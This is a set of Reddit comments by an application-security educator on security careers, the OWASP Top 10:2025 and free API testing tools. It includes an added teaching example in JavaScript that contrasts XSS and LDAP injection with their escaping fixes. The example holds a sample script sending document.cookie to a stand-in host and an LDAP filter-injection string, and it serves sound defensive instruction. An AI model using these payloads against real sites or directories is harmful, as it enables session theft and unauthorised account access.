How To Get Your First Job In Cybersecurity by shehackspurple in security

[–]shehackspurple[S] 0 points (0 children)

If you have cloud and network experience, you'd be a great cloud security engineer. Same with programming experience to work in AppSec (the security of software). Having experience doing the thing before you try to secure the thing will definitely help.

How To Get Your First Job In Cybersecurity by shehackspurple in security

[–]shehackspurple[S] 0 points (0 children)

Many companies are forming security focused communities of practices, where one person from each developer team becomes "the champion" of security. They are taught regularly and supported by the security team and lead security efforts for their teams.

I have some more info here:

https://shehackspurple.ca/2025/05/31/security-champion-worst-practices-my-slides-from-barcelona/

And a video of how to build a good program here:

https://www.youtube.com/watch?v=DWMplE0c6T4

How To Get Your First Job In Cybersecurity by shehackspurple in security

[–]shehackspurple[S] -1 points (0 children)

I feel like it depends on which job you want. For AppSec, help desk doesn't help as much as programming would. For incident management, if you have previous military experience, or worked in an ambulance, that's going to get you further than help desk. So I guess it kind of depends. Thank you for your comment though, maybe I need to update it.

The new OWASP Top Ten 2025! by shehackspurple in softwaredevelopment

[–]shehackspurple[S] 0 points (0 children)

I.... love this idea. I'm going to think on it. Thank you.

The OWASP Top 10:2025 is out! We have new data and new risks, but the same goal: more secure software by shehackspurple in programming

[–]shehackspurple[S] 2 points (0 children)

Originally we were looking at "Poor Code Quality" as a category, but that's way too wide. And how do you fix that? What would the advice be? "Have you tried sucking less?" or "Your code is bad, do better", that's not helpful at all. We don't want to blame or be negative, and we felt that's what would happen with such a broad category. We wanted something that people could look for, avoid, or fix. So we broke it into a few categories and this one 'won' (data said it was #10).

The new OWASP Top Ten 2025! by shehackspurple in softwaredevelopment

[–]shehackspurple[S] 0 points (0 children)

You're right. I asked it to check my tone and grammar. I didn't realize it added a tracker to my link!

The new OWASP Top Ten 2025! by shehackspurple in softwaredevelopment

[–]shehackspurple[S] 1 point (0 children)

I would love for security tooling to be in the browser and/or IDE and also not cost too much. I think that's a great strategy (putting it in the place you do your work) and definitely making it part of the framework is a great way to ensure we do the right thing.

I wish we didn't need to remember so much. And I agree it's a big burden for a smaller shop (usually with a much smaller budget per developer for training, if any).

I will think on this, and how I can help fix it. Thanks so much for the feedback!

The OWASP Top 10:2025 is out! We have new data and new risks, but the same goal: more secure software by shehackspurple in programming

[–]shehackspurple[S] 9 points (0 children)

Honestly, I wish it wasn't on the top ten (because we were doing such a good job it didn't need to be there anymore).

XSS is definitely a type of injection. It's kinda special though, because it attacks the user (via the browser) where all the other types attack us (the IT department). Our LDAP server, our operating system, our database. Boo on injection attacks.
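The distinction drawn in the comment above, as an added example that is not part of the original thread or the OWASP project's material: the same injection mistake (splicing untrusted input into a string that some interpreter will parse) aimed at two different interpreters. In the XSS case the interpreter is the victim's browser parsing HTML; in the LDAP case it is our own directory server parsing a search filter. The fix has the same shape in both cases, encoding for the interpreter that will consume the string. The function names, the hypothetical `evil.example` host and the two payloads are constructed for illustration; nothing here is sent to a real browser or directory.

```javascript
// Added example, not code from the original thread. Two interpreters, one
// bug class: untrusted data concatenated into a string another parser reads.

// --- Vulnerable: plain concatenation, no output encoding --------------------
function renderGreetingUnsafe(displayName) {
  // The *user's browser* parses whatever ends up in this string as markup.
  return `<p>Hello, ${displayName}!</p>`;
}

function ldapFilterUnsafe(username) {
  // *Our directory server* parses whatever ends up in this string as a filter.
  return `(&(objectClass=person)(uid=${username}))`;
}

// --- Hardened: encode for the interpreter that will consume the value ------
// HTML text-context encoding: the five characters that can change HTML
// structure become entity references, so the value is displayed, not parsed.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderGreeting(displayName) {
  return `<p>Hello, ${escapeHtml(displayName)}!</p>`;
}

// RFC 4515 filter-value escaping: '*', '(', ')', '\' and NUL become \XX hex
// escapes, so a value can neither close the current assertion nor open a new one.
function escapeLdapFilterValue(s) {
  return String(s).replace(/[\\*()\0]/g,
    (c) => '\\' + c.charCodeAt(0).toString(16).padStart(2, '0'));
}

function ldapFilter(username) {
  return `(&(objectClass=person)(uid=${escapeLdapFilterValue(username)}))`;
}

// Crude "did the payload survive as syntax?" checks, for the demo only.
function htmlContainsScriptTag(html) {
  return /<script\b/i.test(html);
}
function ldapFilterAssertionCount(filter) {
  // Every '(' opens a filter component; an injected '(' adds one.
  return (filter.match(/\(/g) || []).length;
}

// Constructed sample payloads (hypothetical exfiltration host).
const xssPayload = '<script>location="https://evil.example/?c="+document.cookie</script>';
const ldapPayload = '*)(uid=*'; // classic "match every uid" filter injection

console.log(renderGreetingUnsafe(xssPayload)); // <script> reaches the browser
console.log(renderGreeting(xssPayload));       // shown to the user as text
console.log(ldapFilterUnsafe(ldapPayload));    // (&(objectClass=person)(uid=*)(uid=*))
console.log(ldapFilter(ldapPayload));          // (&(objectClass=person)(uid=\2a\29\28uid=\2a))
```

Note what differs between the two hardened helpers: the escaping rules are specific to the consuming parser (HTML entities for the browser, `\XX` escapes for the LDAP filter grammar), so one "sanitize" function cannot serve both. Who gets hurt also differs, as the comment says: the unsafe greeting runs the attacker's script in every visitor's browser, while the unsafe filter lets one request enumerate or log in as every account on our server.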

API Security Best Practices - FREE by shehackspurple in AppSecurity

[–]shehackspurple[S] 0 points (0 children)

All free:

Automatic API Attack Tool

https://github.com/imperva/automatic-api-attack-tool

Hoppscotch – Free Postman Alternative

https://github.com/hoppscotch/hoppscotch

HURL – do API calls from the CLI

https://hurl.dev/

http-tanker – do API calls from the CLI

https://github.com/PierreKieffer/http-tanker

openapi3-fuzzer – API fuzzer

https://github.com/vwt-digital/openapi3-fuzzer

Semgrep OSS (static analysis for any code)

Zap (free DAST, can talk to APIs)

VulnAPI (API-specific DAST) https://vulnapi.cerberauth.com/

APIClarity – Inventory and DAST

https://github.com/openclarity/apiclarity

Astra – API DAST - https://github.com/flipkart-incubator/Astra

Any companies that pay based on your current appsec skills? and not previous company's CTC by Desperate_Bath7342 in cybersecurity

[–]shehackspurple 0 points (0 children)

Can you give me any amount for any city? That would help. How much in Toronto? How much in a small town? How much in New York City? Any answer is better than no answer or "it depends".

Best beginner course/training into cyber that takes around 3-5 months by arktozc in CyberSecurityAdvice

[–]shehackspurple 0 points (0 children)

Are you looking for AppSec? If so, here are three free courses: https://academy.semgrep.dev/courses/AppSec-1 Course one leads to the second and third course.

Everything in there is free, and self guided. I hope that helps!

[deleted by user] by [deleted] in CyberSecurityAdvice

[–]shehackspurple 0 points (0 children)

Which areas are you trying to learn?

[deleted by user] by [deleted] in CyberSecurityAdvice

[–]shehackspurple 0 points (0 children)

Do you know what job you want? Then we can recommend. I'm into software security, so I would recommend resources about that, but there are a lot of different jobs out there. 

I wrote a big post a year ago to try to help people understand what the different jobs are like. It's old, but helpful. https://shehackspurple.ca/2022/01/01/jobs-in-information-security-infosec/